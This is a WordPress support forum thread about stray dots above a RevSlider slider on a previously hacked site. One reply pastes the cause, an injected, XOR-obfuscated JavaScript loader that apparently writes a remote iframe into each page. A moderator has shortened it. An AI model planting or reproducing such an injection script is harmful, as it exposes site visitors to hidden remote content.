    Good Morning,

For some reason, I just noticed that there is a line of dots above our image slider (RevSlider) to the topmost left corner. I updated to the most recent version of wordpress as well as revslider this week.

Can somebody please help me figure this one out? We’re seeing it company-wide on Chrome as well as FireFox.

Here is a small pic of what we are seeing:

Thank you to anyone who might be able to help on this.

  • If you use a commercial theme or plugin and need support, please go to their official support channel. In order to be good stewards of the WordPress community, and encourage innovation and progress, we feel it’s important to direct people to those official locations.

Forum volunteers are also not given access to commercial products, so they would not know why your commercial theme or plugin is not working properly. This is one other reason why volunteers forward you to the commercial product’s vendors. The vendors are responsible for supporting their commercial product.

I’m afraid I can not do that, we do not have the key for support to log us in at the moment. I am working on reaching out to our former web developer in order to get this resolved but I do not see this happening by the end of the work day.

Also, I am not sure if this is directly related to RevSlider – which is why I thought it best to start here in the event that someone else might have come across this before.

I have already found one possible fix, although it did not work unfortunately.

If someone else can provide some help, I would appreciate it. Thank you in advance.

When did this problem start happening? When you upgraded to WordPress 4.3?

Also, have you upgraded to Revslider 5.0.4.1?

RevSlider (a premium plugin) has been reported to not run on WP 4.3. Please update to 5.0.4.1 (released Aug 18th) to correct.

    Hello Matthew,

I only just noticed it today but I had updated WP to the most recent version on Wednesday as well as RevSlider. I just double checked and our current versions are as follows:

    Revolution Slider: Version 5.0.4.1
WordPress: WordPress 4.3 running Kallyas theme.

We recently dealt with an incident in which our site was hacked because our old Web Developers had not upgraded RevSlider and it had left us open to some attacks. I am worried that this was some result of that, although I could be completely misguided regarding this. At this point, I am not sure what has caused this. Any help would be appreciated.

I you deactivate Revslider do the dots still show up?

what other plugins are you using?

what if you deactivate them all?

I deactivated each of the running plugins on the site, and the dots and blank space persisted. I was hoping they would disappear with Revolution Slider deactivating but it was not the case.

    The following are active:
    Footer Putter
    Huge IT Portfolio Gallery
    Revolution Slider
Sucuri Security – Auditing, Malware Scanner and Hardening

the ‘dots’ come from some scripts, inserted directly after the body tag (when viewed in the html code of the page in the browser).

    <script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawogl [mod note: script shortened for security] gdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,mf{,crrglfAjknf’0:kdpcog’0;’1@’2C’1A-qapkrv’1G”;b=””;c=””;var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>`

these scripts might be from the theme – please ask the developer of the theme for help.

    Michael,

Thank you for the response. I will search for some malware scanners (aside from sucuri) and hopefully narrow down what the problem is. We did experience a hack recently due to our web developer having his accounts compromised.

    I appreciate your help!
